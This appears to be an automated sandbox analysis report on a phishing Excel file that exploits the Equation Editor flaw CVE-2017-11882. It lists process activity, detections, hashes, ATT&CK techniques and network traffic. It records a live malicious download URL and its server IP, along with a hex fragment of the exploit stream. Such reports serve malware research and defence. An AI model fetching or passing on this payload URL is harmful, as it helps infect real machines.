Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeMemory allocated: 130000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeMemory allocated: 1A610000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3524Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe TID: 3744Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe TID: 3676Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: EQNEDT32.EXEBinary or memory string: hgkQx0bZZLJUrWxFmRPXH5Fsqo11MpdW7y4iFnOnBgrEaVSPNLYW4TshKdjMsbOzRssqClqFKcptnKiVR7MlMYdNRpaXBDtWntYcVysEChfG80eo8HF1qOQDLuzIxh0PLZVooQOzuQk7FYBbaMc58z9UBRMRq5fwFR8ClBIqeMUEp2DBytrkvNiT6v5kVPmNf2rZ2EV3Z1IPUSdnSPPmqc2TItZzbhF0ks4hHeutoxaQusMkBSexYi0kstFwlzx6eUCN
Source: EQNEDT32.EXEBinary or memory string: ypwyU1OsJGoI9gzmwpH0ELmWtubn8HTSbmYovpXdNywAoujLuu5PbVYYmIJ2HCmQ0hS2SdxpQzOJu4uqKsVD0mAHqOA5Igb5YPIgyioyr6pkLRfobVBSMTnDVxqw817yfekmOMGb54uW2KClAZoAZsbuAnydfVRdlERMcpSFWhGfszcFOr0MXEitDfEEnPlZEv3RYPXQYlaCmh7nh9R69rJg5MHiS1ELUVF56Ohhb2WAflquVDmOM1YoAelAXbzSwleI
Source: EQNEDT32.EXEBinary or memory string: UfbNZoESc6NLHOvdpfYbWygLBie8xAB8UF5CCYC8rXcwQ89Z8UylnvcEQFCy0JozdgH8li5ItoZiIxPg8PJQpowFXP9s7YQA3UbxvMnEtUcRYsbF1yyMHiWehjtcvvvxvCSSKVFCz49uqwcYviMLocJl2iq06RCcPLFOeBKVN6ctpAOt1AtB4aBpjvPnJ8BReTMYWRyPA7OA9boXRqxdid39vrzlC3lio5EkbI4DXdsXUGmlNIzUPnq0m5ziPDqi2kGi
Source: EQNEDT32.EXEBinary or memory string: rEBr304tHgFsyzPPcXV8dAreVTPm9lBvcw6qv32bDfylApbmd54oUsycozejFWgyisg6C6HowVMtrRgj9QXz8PqWXRJejP6ZS9S2fnnOkMwgpVgBQgT3NRVHzzwwN3Rb6vw48odHvNGYpfd2k1OO0b1lRn4zw8lzwNgaLmoMjkptgZZCQcqRlYOvB0DDFI4dFeC16ONZSaB68uWZhcKbSyeeTmv13DPSKu1lBGMmO5scyIV3tAOHsUqpcGio8VoKRIiC
Source: EQNEDT32.EXEBinary or memory string: eL6Q7la1TPigYMZLFUoxYNz1napOC0vPdcZ8aUz4VseqEmuNqZzBcxzwIENLfha9DMtXGsdf8nUUjzCsIJPvOdrUB1j6x8JwvyrH9qnxtZ3G6rg098rpuMspxMgJ8BNwIrF1IJl7Ja5pLKfuuR7ZB1L6Af0dDn5HqQoQj9nIwGPpVIQj8dxnHXWTKKUjEpi875N8TIBdI1lwceEeL7A9Cnh50lvGCEWeeFhnZdEKtExniJNo4IXIzhA7gN4sBtp0xJY6
Source: EQNEDT32.EXEBinary or memory string: enqSmw50XklvAzsJAlS1muLkliuLOtKMkouxDqjvFCZ0Pk1VbMs6bGmvpk6tLA7HA6MXgsGOY95Caz1Q8xZaUgFEjUONkLOzQ6zpEwzax269jb8DGxK6S62p1MaSdMQe5BaVtvAd0FPWqUf2ZkwLYOQsElQn06WQemuDgk5iEBkyzZs3XjBwoThXr5j1vUvTfHkceI2yAGw9Cj4QjLpZFF8wSlFoQQxwf6tNoWHZKskjTuUIfyfstc1HZBnpVorzAe78
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_0361079C mov edx, dword ptr fs:[00000030h]1_2_0361079C
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeQueries volume information: C:\Users\user\AppData\Local\Temp\opponbvew.exe VolumeInformationJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts33
Exploitation for Client Execution
1
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Modify Registry
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Disable or Modify Tools
Security Account Manager1
Remote System Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook31
Virtualization/Sandbox Evasion
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Process Injection
LSA Secrets13
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
Obfuscated Files or Information
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Install Root Certificate
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Quotation_398893.xlam.xlsx71%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
Quotation_398893.xlam.xlsx51%VirustotalBrowse
Quotation_398893.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe7%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe7%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\opponbvew.exe7%ReversingLabs
C:\Users\user\AppData\Local\Temp\opponbvew.exe7%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://crl.entrust.net/server1.crl00%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
https://secure.comodo.com/CPS00%URL Reputationsafe
http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
estqrow.com
154.38.177.76
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://estqrow.com/rt/vss.exetrue
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpfalseunknown
      http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://ocsp.entrust.net03EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      https://estqrow.com/EQNEDT32.EXE, 00000001.00000002.468050895.0000000000314000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://ocsp.entrust.net0DEQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://estqrow.com/rt/vss.exehhC:EQNEDT32.EXE, 00000001.00000002.468050895.00000000002DE000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://estqrow.com/rt/vss.exejEQNEDT32.EXE, 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://estqrow.com/rt/vss.exeC:EQNEDT32.EXE, 00000001.00000002.468879887.0000000007210000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              154.38.177.76
              estqrow.comUnited States
              174COGENT-174UStrue
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1530599
              Start date and time:2024-10-10 09:41:51 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 48s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:Quotation_398893.xlam.xlsx
              Detection:MAL
              Classification:mal100.expl.winXLSX@4/4@1/1
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:
              • Successful, ratio: 96%
              • Number of executed functions: 25
              • Number of non-executed functions: 2
              Cookbook Comments:
              • Found application associated with file extension: .xlsx
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Active ActiveX Object
              • Scroll down
              • Close Viewer
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
              • Execution Graph export aborted for target opponbvew.exe, PID 3664 because it is empty
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              03:43:33API Interceptor59x Sleep call for process: EQNEDT32.EXE modified
              03:43:35API Interceptor42x Sleep call for process: opponbvew.exe modified
              No context
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              COGENT-174USna.elfGet hashmaliciousMiraiBrowse
              • 149.95.226.175
              Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
              • 154.23.184.240
              na.elfGet hashmaliciousMiraiBrowse
              • 149.113.146.12
              na.elfGet hashmaliciousMiraiBrowse
              • 149.110.229.168
              Quarantined Messages(11).zipGet hashmaliciousHTMLPhisherBrowse
              • 154.12.225.163
              na.elfGet hashmaliciousUnknownBrowse
              • 38.60.249.66
              na.elfGet hashmaliciousUnknownBrowse
              • 143.244.148.132
              na.elfGet hashmaliciousUnknownBrowse
              • 154.48.113.102
              RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
              • 38.47.232.196
              klYCjbl66s.rtfGet hashmaliciousUnknownBrowse
              • 38.240.41.28
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              7dcce5b76c8b17472d024758970a406bDocumentosrs.ppamGet hashmaliciousRevengeRATBrowse
              • 154.38.177.76
              PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
              • 154.38.177.76
              COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
              • 154.38.177.76
              Ordin de plat#U0103.docx.docGet hashmaliciousUnknownBrowse
              • 154.38.177.76
              COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
              • 154.38.177.76
              PAYMENT APPLICATION.xlsGet hashmaliciousUnknownBrowse
              • 154.38.177.76
              yYk4nXhHaA.docGet hashmaliciousUnknownBrowse
              • 154.38.177.76
              Maersk BL, IN & PL.xlsGet hashmaliciousRemcosBrowse
              • 154.38.177.76
              PO20241008.xlsGet hashmaliciousUnknownBrowse
              • 154.38.177.76
              PO20241008.xlsGet hashmaliciousUnknownBrowse
              • 154.38.177.76
              No context
              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):30208
              Entropy (8bit):4.949634118704398
              Encrypted:false
              SSDEEP:384:E7f/5MRXGHE4ii3BmrBDcJ+NaFcwaGFKLRk6bYK+CpPX:EeRgtNYcoicBv+CxX
              MD5:F5435E421FF6FCFC359478B4CF638358
              SHA1:107028E913C15EB20491BCDFD2597CE55BCD8FDA
              SHA-256:9ED7ADB8DB639FB82E25A253FEC5AABF20F102BD54C6199BE44FDE9FE6841B74
              SHA-512:C50CCB58FFDBC41E8D740544C06756F4ADE9928BC85D01F354F9A645C030127FCC52DA14C0A7741C2161286E6327BE0CC7D579B4859A7E760FC53A22125F0602
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 7%
              • Antivirus: Virustotal, Detection: 7%, Browse
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...kF.Y.................<...6.......[... ...`....@.. ....................................`.................................@[..K.......x1...........................`............................................... ............... ..H............text....;... ...<.................. ..`.sdata..8....`.......@..............@....rsrc...x1.......2...B..............@..@.reloc...............t..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):30208
              Entropy (8bit):4.949634118704398
              Encrypted:false
              SSDEEP:384:E7f/5MRXGHE4ii3BmrBDcJ+NaFcwaGFKLRk6bYK+CpPX:EeRgtNYcoicBv+CxX
              MD5:F5435E421FF6FCFC359478B4CF638358
              SHA1:107028E913C15EB20491BCDFD2597CE55BCD8FDA
              SHA-256:9ED7ADB8DB639FB82E25A253FEC5AABF20F102BD54C6199BE44FDE9FE6841B74
              SHA-512:C50CCB58FFDBC41E8D740544C06756F4ADE9928BC85D01F354F9A645C030127FCC52DA14C0A7741C2161286E6327BE0CC7D579B4859A7E760FC53A22125F0602
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 7%
              • Antivirus: Virustotal, Detection: 7%, Browse
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...kF.Y.................<...6.......[... ...`....@.. ....................................`.................................@[..K.......x1...........................`............................................... ............... ..H............text....;... ...<.................. ..`.sdata..8....`.......@..............@....rsrc...x1.......2...B..............@..@.reloc...............t..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):165
              Entropy (8bit):1.4377382811115937
              Encrypted:false
              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
              MD5:797869BB881CFBCDAC2064F92B26E46F
              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
              Malicious:false
              Reputation:high, very likely benign file
              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):165
              Entropy (8bit):1.4377382811115937
              Encrypted:false
              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
              MD5:797869BB881CFBCDAC2064F92B26E46F
              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
              Malicious:true
              Reputation:high, very likely benign file
              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              File type:Microsoft Excel 2007+
              Entropy (8bit):7.9984395290620505
              TrID:
              • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
              • ZIP compressed archive (8000/1) 18.60%
              File name:Quotation_398893.xlam.xlsx
              File size:849'761 bytes
              MD5:8ab8d813d3ca68c8effdb8abbf4a4f86
              SHA1:f26fa096a70eec2a9900e363f63a1e6cafe5e8d4
              SHA256:11a5d3add86410357163004a54f22335583b895a390e7eaf567e423ac7ccfeff
              SHA512:cc5afb9559e049d62133d89c488d12b81c8338bf29177def06f890310ae75ae2964a21d07e3cf6bcbbdc103cfdf102f1ce35111ead80f9c8d247c8b8b663f0a5
              SSDEEP:24576:7Y6dnGcLIS97usf6ZHqRPK21eOWWiB5Etu/3PP4qZaP2/:7YEvLISHkqjEhWVt2PwqZaP2/
              TLSH:38053301C61A3624A1207A31BE57E1B9BCB0E3B2AD095A797B5FDF037BD11E08335696
              File Content Preview:PK........<-IY2...............[Content_Types].xmlUT......g...g...g.UMk.1......].Jv....sh.[..&.<+.m..BR...;..S.....\.C..7.iF.]........aS>a.:..v......_Y.28..;l.......0.;.L.E...u....I..B.>......2.... 7.Bq1.|.......`......hru...>..V....+T.....q1.-(...V...O.4/
              Icon Hash:2562ab89a7b7bfbf
              Document Type:OpenXML
              Number of OLE Files:1
              Has Summary Info:
              Application Name:
              Encrypted Document:False
              Contains Word Document Stream:False
              Contains Workbook/Book Stream:False
              Contains PowerPoint Document Stream:False
              Contains Visio Document Stream:False
              Contains ObjectPool Stream:False
              Flash Objects Count:0
              Contains VBA Macros:False
              Author:
              Last Saved By:
              Create Time:2006-09-16T00:00:00Z
              Last Saved Time:2024-10-09T12:38:50Z
              Creating Application:Microsoft Excel
              Security:0
              Thumbnail Scaling Desired:false
              Contains Dirty Links:false
              Shared Document:false
              Changed Hyperlinks:false
              Application Version:12.0000
              General
              Stream Path:\x1oLE10NaTiVE
              CLSID:
              File Type:data
              Stream Size:978711
              Entropy:5.983055784913961
              Base64 Encoded:True
              Data ASCII:. . . ; R . . u ] G _ | E . . M ? . . c ( B . Q . ? R 8 - ) Q 8 R D . . . 0 4 . . T . n c P . d a K . u ) : t a * ; b . t P . y . . 1 . $ U e I . * 1 ? 3 z r . , p . @ t . = C a . ? W ~ F . B , . ! & . > s . G ` 6 R 5 w . ^ w ) | & . 5 z & 5 V % . H W ? . . . . [ ! . _ h . q > . . . . . I m b . $ 0 . K H < o S . v A 2 . [ . ) l r . / . r % I f e . . . w o . W h 2 . ~ . . E . . 9 . H O . = - 2 O ` H 4 ' l H . 5 . d + J ` . # % a - ) . . 3 3 0 5 d o . O M { 4 T p I + . h . . . . ; . i . ? L & _ S @ . 4
              Data Raw:84 95 0b 03 02 3b c1 52 dd e6 01 08 9c 75 bd e1 5d a9 83 81 c5 47 5f 9c 7c 8b 45 14 8b 08 be 4d 3f 04 10 81 c6 63 28 42 f0 8b 06 51 ff d0 05 3f 52 bc 38 2d 29 51 bc 38 ff e0 ba 52 44 00 0c 99 1c 30 34 04 cb 98 54 c2 9c b9 6e 63 e8 80 ed cb 50 c3 ba 64 c7 cf f1 be c3 ee 61 4b ed 80 d8 b8 e5 d1 cf c2 75 da 29 b9 3a 74 61 9e 2a 3b f9 62 e6 c9 91 c4 74 50 c6 e6 04 d1 79 07 1c 85 8c f0
              General
              Stream Path:sK
              CLSID:
              File Type:empty
              Stream Size:0
              Entropy:0.0
              Base64 Encoded:False
              Data ASCII:
              Data Raw:
              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2024-10-10T09:43:36.779057+02002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.2249161154.38.177.76443TCP
              TimestampSource PortDest PortSource IPDest IP
              Oct 10, 2024 09:43:36.003531933 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.003632069 CEST44349161154.38.177.76192.168.2.22
              Oct 10, 2024 09:43:36.003712893 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.027502060 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.027527094 CEST44349161154.38.177.76192.168.2.22
              Oct 10, 2024 09:43:36.590274096 CEST44349161154.38.177.76192.168.2.22
              Oct 10, 2024 09:43:36.590430021 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.597330093 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.597362995 CEST44349161154.38.177.76192.168.2.22
              Oct 10, 2024 09:43:36.597682953 CEST44349161154.38.177.76192.168.2.22
              Oct 10, 2024 09:43:36.597743034 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.683852911 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.731410980 CEST44349161154.38.177.76192.168.2.22
              Oct 10, 2024 09:43:36.779019117 CEST44349161154.38.177.76192.168.2.22
              Oct 10, 2024 09:43:36.779175997 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.866353989 CEST44349161154.38.177.76192.168.2.22
              Oct 10, 2024 09:43:36.866389036 CEST44349161154.38.177.76192.168.2.22
              Oct 10, 2024 09:43:36.866456985 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.866518974 CEST44349161154.38.177.76192.168.2.22
              Oct 10, 2024 09:43:36.866736889 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.866806984 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.867002964 CEST44349161154.38.177.76192.168.2.22
              Oct 10, 2024 09:43:36.867058039 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.867104053 CEST44349161154.38.177.76192.168.2.22
              Oct 10, 2024 09:43:36.867156029 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.867170095 CEST44349161154.38.177.76192.168.2.22
              Oct 10, 2024 09:43:36.867213964 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.867271900 CEST44349161154.38.177.76192.168.2.22
              Oct 10, 2024 09:43:36.867363930 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.869575977 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.871098042 CEST49161443192.168.2.22154.38.177.76
              Oct 10, 2024 09:43:36.871114016 CEST44349161154.38.177.76192.168.2.22
              TimestampSource PortDest PortSource IPDest IP
              Oct 10, 2024 09:43:35.945506096 CEST5456253192.168.2.228.8.8.8
              Oct 10, 2024 09:43:35.986269951 CEST53545628.8.8.8192.168.2.22
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Oct 10, 2024 09:43:35.945506096 CEST192.168.2.228.8.8.80x3591Standard query (0)estqrow.comA (IP address)IN (0x0001)false
